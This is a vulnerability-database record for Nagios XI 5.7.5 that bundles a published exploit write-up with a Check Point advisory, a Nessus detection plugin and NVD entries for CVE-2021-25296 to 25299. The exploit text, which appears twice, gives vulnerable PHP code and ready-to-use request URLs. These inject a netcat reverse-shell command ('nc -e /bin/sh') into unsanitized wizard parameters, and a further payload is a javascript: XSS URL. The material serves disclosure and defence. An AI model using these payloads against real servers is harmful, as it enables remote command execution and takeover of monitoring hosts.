Nagios XI 5.7.5 Remote Code Execution Exploit

2021-02-26T00:00:00

Description

{"id": "1337DAY-ID-35875", "type": "zdt", "bulletinFamily": "exploit", "title": "Nagios XI 5.7.5 Remote Code Execution Exploit", "description": "", "published": "2021-02-26T00:00:00", "modified": "2021-02-26T00:00:00", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "COMPLETE", "baseScore": 9.0, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.0, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 2.8, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/35875", "reporter": "zdt", "references": [], "cvelist": ["CVE-2021-25299", "CVE-2021-25297", "CVE-2021-25298", "CVE-2021-25296"], "immutableFields": [], "lastseen": "2021-09-09T22:25:43", "viewCount": 8, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:532E90DB-4495-454E-B0D0-8DD690C03B16", "AKB:58421098-D895-41C4-95F2-2B3E4E3CD2C0", "AKB:E3841EB6-6FF5-4072-8716-B4BD203AFDB0"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2021-0085"]}, {"type": "cisa", "idList": ["CISA:D7385BDD2786721598A2135E182282C2"]}, {"type": "cve", "idList": ["CVE-2021-25296", "CVE-2021-25297", "CVE-2021-25298", "CVE-2021-25299"]}, {"type": "nessus", "idList": ["NAGIOSXI_5_7_5_COMMAND_INJECTION.NASL"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:161561"]}], "rev": 4}, "score": {"value": 6.9, "vector": "NONE"}, "backreferences": {"references": [{"type": "attackerkb", "idList": ["AKB:532E90DB-4495-454E-B0D0-8DD690C03B16", "AKB:58421098-D895-41C4-95F2-2B3E4E3CD2C0", "AKB:E3841EB6-6FF5-4072-8716-B4BD203AFDB0"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2021-0085"]}, {"type": "cisa", "idList": ["CISA:D7385BDD2786721598A2135E182282C2"]}, {"type": "cve", "idList": ["CVE-2021-25296", "CVE-2021-25297", "CVE-2021-25298", "CVE-2021-25299"]}, {"type": "nessus", "idList": ["NAGIOSXI_5_7_5_COMMAND_INJECTION.NASL"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:161561"]}]}, "exploitation": null, "vulnersScore": 6.9}, "sourceHref": "https://0day.today/exploit/35875", "sourceData": "# nagios-xi-5.7.5-bugs\r\nBugs reported to Nagios XI\r\n\r\n\r\n## CVE-2021-25296\r\n\r\n### Code Location\r\n\r\n`/usr/local/nagiosxi/html/includes/configwizards/windowswmi/windowswmi.inc.php`\r\n\r\n### Code snippet\r\n\r\n```php\r\nif (!empty($plugin_output_len)) {\r\n $disk_wmi_command .= \" --forcetruncateoutput \" . $plugin_output_len;\r\n $service_wmi_command .= \" --forcetruncateoutput \" . $plugin_output_len;\r\n $process_wmi_command .= \" --forcetruncateoutput \" . $plugin_output_len;\r\n}\r\necho $disk_wmi_command;\r\n// Run the WMI plugin to get realtime info\r\nexec($disk_wmi_command, $disk_output, $disk_return_var);\r\nexec($service_wmi_command, $service_output, $service_return_var);\r\nexec($process_wmi_command, $process_output, $process_return_var);\r\n```\r\n\r\n### POC (Works with admin/non-admin authentication)\r\n\r\n`https://10.0.2.15/nagiosxi/config/monitoringwizard.php?update=1&nsp=50c0f98fe9018dc43c81672ad1aeed5fd3f9710f013381519e553f846b5c2a86&nextstep=3&wizard=windowswmi&check_wmic_plus_ver=1.65&plugin_output_len=&ip_address=127.0.0.1&domain=127.0.0.1&username=asdf&password=asdf&auth_file=&plugin_output_len=1024; nc -e /bin/sh 127.0.0.1 4444;&submitButton2=`\r\n\r\nThe `plugin_output_len` variable here is not sanitized and can give `command execution`. Eg: `plugin_output_len=1024; nc -e /bin/sh 127.0.0.1 4444;`\r\n\r\n\r\n## CVE-2021-25297\r\n\r\n### Code Location\r\n\r\n`/usr/local/nagiosxi/html/includes/configwizards/switch/switch.inc.php`\r\n\r\n### Code Snippet\r\n\r\n```php\r\nfunction switch_configwizard_add_cfg_to_mrtg($address)\r\n{\r\n // get the data that we need\r\n $mrtg_confd_dir = \"/etc/mrtg/conf.d\";\r\n echo $address;\r\n $mrtg_cfg_file = \"{$address}.cfg\";\r\n $absolute_mrtg_cfg_file = \"{$mrtg_confd_dir}/{$mrtg_cfg_file}\";\r\n $cfgmaker_file = switch_configwizard_get_walk_file($address);\r\n // check if the file already exists for useful debugging\r\n $mrtg_confd_contents = scandir($mrtg_confd_dir);\r\n echo \"REACHED HERE1\";\r\n if (in_array($mrtg_cfg_file, $mrtg_confd_contents)) {\r\n debug(\"{$mrtg_cfg_file} exists in {$mrtg_confd_dir}, overwriting\");\r\n } else {\r\n debug(\"{$mrtg_cfg_file} does not exist in {$mrtg_confd_dir}, creating\");\r\n }\r\n echo \"REACHED HERE2\";\r\n // copy the cfgmaker file to the mrtg cfg destination\r\n echo $cfgmaker_file;\r\n echo $absolute_mrtg_cfg_file;\r\n if (!copy($cfgmaker_file, $absolute_mrtg_cfg_file)) {\r\n debug(\"Unable to copy from {$cfgmaker_file} to {$absolute_mrtg_cfg_file}\");\r\n return false;\r\n }\r\n echo \"REACHED HERE3\";\r\n echo $absolute_mrtg_cfg_file;\r\n // add some meta info to the file\r\n $infoline = \"#### ADDED BY NAGIOSXI (User: \". get_user_attr(0, 'username') .\", DATE: \". get_datetime_string(time()) .\") ####\\n\";\r\n exec(\"sed -i '1s|.*|{$infoline}&|' $absolute_mrtg_cfg_file\");\r\n\r\n return true;\r\n}\r\n```\r\n\r\n### POC (Works with admin/non-admin authentication)\r\n\r\n```\r\nhttps://10.0.2.15/nagiosxi/config/monitoringwizard.php?update=1&nsp=4e4f78ca5c24c7c526dc86b23092b81c3231a7bf59e1eb67f9918b8daf7b6de9&nextstep=3&wizard=switch&ip_address=127.0.0.1;nc -e /bin/sh 127.0.0.1 4445;&port=161&snmpversion=2c&snmpopts%5Bsnmpcommunity%5D=public&snmpopts%5Bv3_security_level%5D=authPriv&snmpopts%5Bv3_username%5D=&snmpopts%5Bv3_auth_password%5D=&snmpopts%5Bv3_auth_proto%5D=MD5&snmpopts%5Bv3_priv_password%5D=&snmpopts%5Bv3_priv_proto%5D=DES&portnames=number&scaninterfaces=on&bulk_fields%5B%5D=ip_address&bulk_fields%5B%5D=&bulk_fields%5B%5D=&bulk_options=&bulk_fields%5B%5D=&bulk_fields%5B%5D=&warn_speed_in_percent=50&crit_speed_in_percent=80&warn_speed_out_percent=50&crit_speed_out_percent=80&default_port_speed=100&submitButton2=\r\n```\r\n\r\nThe `ip_address` variable here is not sanitized and can give `command execution`. Eg: `ip_address=1024; nc -e /bin/sh 127.0.0.1 4444;`\r\n\r\n\r\n## CVE-2021-25298\r\n\r\n### Code path\r\n\r\n`/usr/local/nagiosxi/html/includes/configwizards/cloud-vm/cloud-vm.inc.php`\r\n\r\n### Code Snippet\r\n\r\n```php\r\ncase CONFIGWIZARD_MODE_GETSTAGE2HTML:\r\n\r\n // echo (\"reached here ============================\");\r\n // Get variables that were passed to us\r\n $address = grab_array_var($inargs, \"ip_address\", \"\"); // [User input]\r\n $port = grab_array_var($inargs, \"port\", \"\");\r\n $token = grab_array_var($inargs, \"token\", \"\");\r\n $no_ssl_verify = grab_array_var($inargs, \"no_ssl_verify\", 1);\r\n $hostname = grab_array_var($inargs, 'hostname', gethostbyaddr($address));\r\n $default_mem_units = grab_array_var($inargs, 'default_mem_units', 'Gi');\r\n $tcp_check_port = grab_array_var($inargs, 'tcp_check_port', '5693');\r\n $rp_address = nagiosccm_replace_user_macros($address);\r\n $rp_port = nagiosccm_replace_user_macros($port);\r\n $rp_token = nagiosccm_replace_user_macros($token);\r\n $services_serial = grab_array_var($inargs, \"services_serial\", \"\");\r\n if ($services_serial) {\r\n $services = unserialize(base64_decode($services_serial));\r\n }\r\n // echo $rp_address;\r\n $not_used = array();\r\n $return_code = 0;\r\n $alternative_host_check = false;\r\n exec('ping -W 2 -c 1 ' . $rp_address, $not_used, $return_code); // [Bug here]\r\n```\r\n\r\n### POC (Works with admin/non-admin authentication)\r\n\r\n```\r\nhttps://10.0.2.15/nagiosxi/config/monitoringwizard.php?update=1&nsp=e2401df06a3892ba612df20e1ce2f559d7647c4b5fcba7f64c23c0ea9df1564f&nextstep=4&wizard=digitalocean&no_ssl_verify=1&ip_address=127.0.0.1;nc -e /bin/sh 127.0.0.1 4445;&port=5693&token=123&submitButton2=\r\n```\r\n\r\nThe `ip_address` variable here is not sanitized and can give `command execution`. Eg: `ip_address=1024; nc -e /bin/sh 127.0.0.1 4444;`\r\n\r\n\r\n## CVE-2021-25299\r\n\r\n### Code Location\r\n\r\n`/usr/local/nagiosxi/html/admin/sshterm.php`\r\n\r\n### Code Snippet\r\n\r\n```php+HTML\r\n<?php if ($efe) { ?>\r\n <iframe src=\"<?php echo $url; ?>\" style=\"width: 50%; min-width: 600px; height: 500px;\"></iframe>\r\n <?php } else { ?>\r\n <div style=\"color: #FFF; font-size: 14px; font-family: consolas, courier-new; background-color: #000; padding: 2px 6px; overflow-y: scroll; width: 50%; min-width: 600px; height: 500px;\">Enterprise features must be enabled</div>\r\n<?php\r\n}\r\n```\r\n\r\n### POC\r\n\r\n`https://10.0.2.15/nagiosxi/admin/sshterm.php?url=javascript:alert(1)`\r\n\r\nThe `url` variable is not sanitized and can give `xss` .\n\n# 0day.today [2021-09-10] #", "_state": {"dependencies": 1646075521}}

{"checkpoint_advisories": [{"lastseen": "2022-02-16T19:35:08", "description": "A remote code execution vulnerability exists in Nagios XI. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-02-18T00:00:00", "type": "checkpoint_advisories", "title": "Nagios XI Remote Code Execution (CVE-2021-25296; CVE-2021-25297; CVE-2021-25298; CVE-2021-25299)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-25296", "CVE-2021-25297", "CVE-2021-25298", "CVE-2021-25299"], "modified": "2021-03-14T00:00:00", "id": "CPAI-2021-0085", "href": "", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}], "packetstorm": [{"lastseen": "2021-02-26T16:40:53", "description": "", "cvss3": {}, "published": "2021-02-26T00:00:00", "type": "packetstorm", "title": "Nagios XI 5.7.5 Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2021-25296", "CVE-2021-25297", "CVE-2021-25298", "CVE-2021-25299"], "modified": "2021-02-26T00:00:00", "id": "PACKETSTORM:161561", "href": "https://packetstormsecurity.com/files/161561/Nagios-XI-5.7.5-Remote-Code-Execution.html", "sourceData": "`# nagios-xi-5.7.5-bugs \nBugs reported to Nagios XI \n \n \n## CVE-2021-25296 \n \n### Code Location \n \n`/usr/local/nagiosxi/html/includes/configwizards/windowswmi/windowswmi.inc.php` \n \n### Code snippet \n \n```php \nif (!empty($plugin_output_len)) { \n$disk_wmi_command .= \" --forcetruncateoutput \" . $plugin_output_len; \n$service_wmi_command .= \" --forcetruncateoutput \" . $plugin_output_len; \n$process_wmi_command .= \" --forcetruncateoutput \" . $plugin_output_len; \n} \necho $disk_wmi_command; \n// Run the WMI plugin to get realtime info \nexec($disk_wmi_command, $disk_output, $disk_return_var); \nexec($service_wmi_command, $service_output, $service_return_var); \nexec($process_wmi_command, $process_output, $process_return_var); \n``` \n \n### POC (Works with admin/non-admin authentication) \n \n`https://10.0.2.15/nagiosxi/config/monitoringwizard.php?update=1&nsp=50c0f98fe9018dc43c81672ad1aeed5fd3f9710f013381519e553f846b5c2a86&nextstep=3&wizard=windowswmi&check_wmic_plus_ver=1.65&plugin_output_len=&ip_address=127.0.0.1&domain=127.0.0.1&username=asdf&password=asdf&auth_file=&plugin_output_len=1024; nc -e /bin/sh 127.0.0.1 4444;&submitButton2=` \n \nThe `plugin_output_len` variable here is not sanitized and can give `command execution`. Eg: `plugin_output_len=1024; nc -e /bin/sh 127.0.0.1 4444;` \n \n \n## CVE-2021-25297 \n \n### Code Location \n \n`/usr/local/nagiosxi/html/includes/configwizards/switch/switch.inc.php` \n \n### Code Snippet \n \n```php \nfunction switch_configwizard_add_cfg_to_mrtg($address) \n{ \n// get the data that we need \n$mrtg_confd_dir = \"/etc/mrtg/conf.d\"; \necho $address; \n$mrtg_cfg_file = \"{$address}.cfg\"; \n$absolute_mrtg_cfg_file = \"{$mrtg_confd_dir}/{$mrtg_cfg_file}\"; \n$cfgmaker_file = switch_configwizard_get_walk_file($address); \n// check if the file already exists for useful debugging \n$mrtg_confd_contents = scandir($mrtg_confd_dir); \necho \"REACHED HERE1\"; \nif (in_array($mrtg_cfg_file, $mrtg_confd_contents)) { \ndebug(\"{$mrtg_cfg_file} exists in {$mrtg_confd_dir}, overwriting\"); \n} else { \ndebug(\"{$mrtg_cfg_file} does not exist in {$mrtg_confd_dir}, creating\"); \n} \necho \"REACHED HERE2\"; \n// copy the cfgmaker file to the mrtg cfg destination \necho $cfgmaker_file; \necho $absolute_mrtg_cfg_file; \nif (!copy($cfgmaker_file, $absolute_mrtg_cfg_file)) { \ndebug(\"Unable to copy from {$cfgmaker_file} to {$absolute_mrtg_cfg_file}\"); \nreturn false; \n} \necho \"REACHED HERE3\"; \necho $absolute_mrtg_cfg_file; \n// add some meta info to the file \n$infoline = \"#### ADDED BY NAGIOSXI (User: \". get_user_attr(0, 'username') .\", DATE: \". get_datetime_string(time()) .\") ####\\n\"; \nexec(\"sed -i '1s|.*|{$infoline}&|' $absolute_mrtg_cfg_file\"); \n \nreturn true; \n} \n``` \n \n### POC (Works with admin/non-admin authentication) \n \n``` \nhttps://10.0.2.15/nagiosxi/config/monitoringwizard.php?update=1&nsp=4e4f78ca5c24c7c526dc86b23092b81c3231a7bf59e1eb67f9918b8daf7b6de9&nextstep=3&wizard=switch&ip_address=127.0.0.1;nc -e /bin/sh 127.0.0.1 4445;&port=161&snmpversion=2c&snmpopts%5Bsnmpcommunity%5D=public&snmpopts%5Bv3_security_level%5D=authPriv&snmpopts%5Bv3_username%5D=&snmpopts%5Bv3_auth_password%5D=&snmpopts%5Bv3_auth_proto%5D=MD5&snmpopts%5Bv3_priv_password%5D=&snmpopts%5Bv3_priv_proto%5D=DES&portnames=number&scaninterfaces=on&bulk_fields%5B%5D=ip_address&bulk_fields%5B%5D=&bulk_fields%5B%5D=&bulk_options=&bulk_fields%5B%5D=&bulk_fields%5B%5D=&warn_speed_in_percent=50&crit_speed_in_percent=80&warn_speed_out_percent=50&crit_speed_out_percent=80&default_port_speed=100&submitButton2= \n``` \n \nThe `ip_address` variable here is not sanitized and can give `command execution`. Eg: `ip_address=1024; nc -e /bin/sh 127.0.0.1 4444;` \n \n \n## CVE-2021-25298 \n \n### Code path \n \n`/usr/local/nagiosxi/html/includes/configwizards/cloud-vm/cloud-vm.inc.php` \n \n### Code Snippet \n \n```php \ncase CONFIGWIZARD_MODE_GETSTAGE2HTML: \n \n// echo (\"reached here ============================\"); \n// Get variables that were passed to us \n$address = grab_array_var($inargs, \"ip_address\", \"\"); // [User input] \n$port = grab_array_var($inargs, \"port\", \"\"); \n$token = grab_array_var($inargs, \"token\", \"\"); \n$no_ssl_verify = grab_array_var($inargs, \"no_ssl_verify\", 1); \n$hostname = grab_array_var($inargs, 'hostname', gethostbyaddr($address)); \n$default_mem_units = grab_array_var($inargs, 'default_mem_units', 'Gi'); \n$tcp_check_port = grab_array_var($inargs, 'tcp_check_port', '5693'); \n$rp_address = nagiosccm_replace_user_macros($address); \n$rp_port = nagiosccm_replace_user_macros($port); \n$rp_token = nagiosccm_replace_user_macros($token); \n$services_serial = grab_array_var($inargs, \"services_serial\", \"\"); \nif ($services_serial) { \n$services = unserialize(base64_decode($services_serial)); \n} \n// echo $rp_address; \n$not_used = array(); \n$return_code = 0; \n$alternative_host_check = false; \nexec('ping -W 2 -c 1 ' . $rp_address, $not_used, $return_code); // [Bug here] \n``` \n \n### POC (Works with admin/non-admin authentication) \n \n``` \nhttps://10.0.2.15/nagiosxi/config/monitoringwizard.php?update=1&nsp=e2401df06a3892ba612df20e1ce2f559d7647c4b5fcba7f64c23c0ea9df1564f&nextstep=4&wizard=digitalocean&no_ssl_verify=1&ip_address=127.0.0.1;nc -e /bin/sh 127.0.0.1 4445;&port=5693&token=123&submitButton2= \n``` \n \nThe `ip_address` variable here is not sanitized and can give `command execution`. Eg: `ip_address=1024; nc -e /bin/sh 127.0.0.1 4444;` \n \n \n## CVE-2021-25299 \n \n### Code Location \n \n`/usr/local/nagiosxi/html/admin/sshterm.php` \n \n### Code Snippet \n \n```php+HTML \n<?php if ($efe) { ?> \n<iframe src=\"<?php echo $url; ?>\" style=\"width: 50%; min-width: 600px; height: 500px;\"></iframe> \n<?php } else { ?> \n<div style=\"color: #FFF; font-size: 14px; font-family: consolas, courier-new; background-color: #000; padding: 2px 6px; overflow-y: scroll; width: 50%; min-width: 600px; height: 500px;\">Enterprise features must be enabled</div> \n<?php \n} \n``` \n \n### POC \n \n`https://10.0.2.15/nagiosxi/admin/sshterm.php?url=javascript:alert(1)` \n \nThe `url` variable is not sanitized and can give `xss` . \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/161561/nagiosxi575-exec.txt", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2022-06-16T14:11:27", "description": "According to the self-reported version of Nagios XI, the remote host may be affected by multiple vulnerabilities, including the following:\n\n - A command injection vulnerability in the file /usr/local/nagiosxi/html/includes/configwizards/windowswmi/windowswmi.inc.php due to improper sanitization of authenticated user-controlled input by a single HTTP request (CVE-2021-25296).\n\n - A command injection vulnerability in the file /usr/local/nagiosxi/html/includes/configwizards/switch/switch.inc.php due to improper sanitization of authenticated user-controlled input by a single HTTP request (CVE-2021-25297).\n\n - A command injection vulnerability in the file /usr/local/nagiosxi/html/includes/configwizards/cloud-vm/cloud-vm.inc.php due to improper sanitization of authenticated user-controlled input by a single HTTP request (CVE-2021-25298).\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {"score": 8.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2022-02-04T00:00:00", "type": "nessus", "title": "Nagios XI 5.7.5 Command Injection", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-25296", "CVE-2021-25297", "CVE-2021-25298"], "modified": "2022-02-04T00:00:00", "cpe": ["cpe:/a:nagios:nagios_xi"], "id": "NAGIOSXI_5_7_5_COMMAND_INJECTION.NASL", "href": "https://www.tenable.com/plugins/nessus/157377", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(157377);\n script_version(\"1.2\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/02/04\");\n\n script_cve_id(\"CVE-2021-25296\", \"CVE-2021-25297\", \"CVE-2021-25298\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/02/01\");\n\n script_name(english:\"Nagios XI 5.7.5 Command Injection\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host has a web application that may be affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the self-reported version of Nagios XI, the remote host may be affected by multiple vulnerabilities, including\nthe following:\n\n - A command injection vulnerability in the file /usr/local/nagiosxi/html/includes/configwizards/windowswmi/windowswmi.inc.php\n due to improper sanitization of authenticated user-controlled input by a single HTTP request (CVE-2021-25296).\n\n - A command injection vulnerability in the file /usr/local/nagiosxi/html/includes/configwizards/switch/switch.inc.php\n due to improper sanitization of authenticated user-controlled input by a single HTTP request (CVE-2021-25297).\n\n - A command injection vulnerability in the file /usr/local/nagiosxi/html/includes/configwizards/cloud-vm/cloud-vm.inc.php\n due to improper sanitization of authenticated user-controlled input by a single HTTP request (CVE-2021-25298).\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.nagios.com/downloads/nagios-xi/change-log/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.nagios.com/products/security/\");\n script_set_attribute(attribute:\"solution\", value:\n\"See vendor advisory.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-25298\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/02/13\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/02/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/02/04\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:nagios:nagios_xi\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2022 Tenable Network Security, Inc.\");\n\n script_dependencies(\"nagios_enterprise_detect.nasl\");\n script_require_keys(\"installed_sw/nagios_xi\", \"Settings/ParanoidReport\");\n script_require_ports(\"Services/www\", 80);\n\n exit(0);\n}\n\ninclude('http_func.inc');\ninclude('vcf_extras.inc');\n\nvar port = get_http_port(default:80, embedded:TRUE);\n\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\nvar app_info = vcf::nagiosxi::get_app_info(port:port);\n\nvar constraints = [\n {'min_version': '5.7.5', 'max_version': '5.7.5.99999', 'fixed_display': 'See vendor advisory'}\n];\n\n# DOn't use the vcf::nagiosxi as we don't want R201* versions to be flagged\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE);\n", "cvss": {"score": 9, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}], "cve": [{"lastseen": "2022-03-23T15:20:01", "description": "Nagios XI version xi-5.7.5 is affected by cross-site scripting (XSS). The vulnerability exists in the file /usr/local/nagiosxi/html/admin/sshterm.php due to improper sanitization of user-controlled input. A maliciously crafted URL, when clicked by an admin user, can be used to steal his/her session cookies or it can be chained with the previous bugs to get one-click remote command execution (RCE) on the Nagios XI server.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 6.1, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 2.7}, "published": "2021-02-15T13:15:00", "type": "cve", "title": "CVE-2021-25299", "cwe": ["CWE-79"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-25299"], "modified": "2021-03-04T21:18:00", "cpe": ["cpe:/a:nagios:nagios_xi:5.7.5"], "id": "CVE-2021-25299", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-25299", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:a:nagios:nagios_xi:5.7.5:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T15:19:58", "description": "Nagios XI version xi-5.7.5 is affected by OS command injection. The vulnerability exists in the file /usr/local/nagiosxi/html/includes/configwizards/switch/switch.inc.php due to improper sanitization of authenticated user-controlled input by a single HTTP request, which can lead to OS command injection on the Nagios XI server.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-02-15T13:15:00", "type": "cve", "title": "CVE-2021-25297", "cwe": ["CWE-78"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-25297"], "modified": "2021-03-09T20:20:00", "cpe": ["cpe:/a:nagios:nagios_xi:5.7.5"], "id": "CVE-2021-25297", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-25297", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:nagios:nagios_xi:5.7.5:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T15:19:58", "description": "Nagios XI version xi-5.7.5 is affected by OS command injection. The vulnerability exists in the file /usr/local/nagiosxi/html/includes/configwizards/windowswmi/windowswmi.inc.php due to improper sanitization of authenticated user-controlled input by a single HTTP request, which can lead to OS command injection on the Nagios XI server.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-02-15T13:15:00", "type": "cve", "title": "CVE-2021-25296", "cwe": ["CWE-78"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-25296"], "modified": "2021-03-04T16:44:00", "cpe": ["cpe:/a:nagios:nagios_xi:5.7.5"], "id": "CVE-2021-25296", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-25296", "cvss": {"score": 9.0, "vector": 